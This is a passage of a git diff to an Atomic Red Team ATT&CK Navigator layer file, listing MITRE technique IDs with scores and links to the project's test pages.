d-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomi
c-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redc
anaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https:
//github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https
://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
index 1530a1d7..6795fd26 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.
md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://g
ithub.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"commen
t":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/
redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team
/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic
-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/a
tomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanar
yco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github
.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.co
m/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/a
tomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.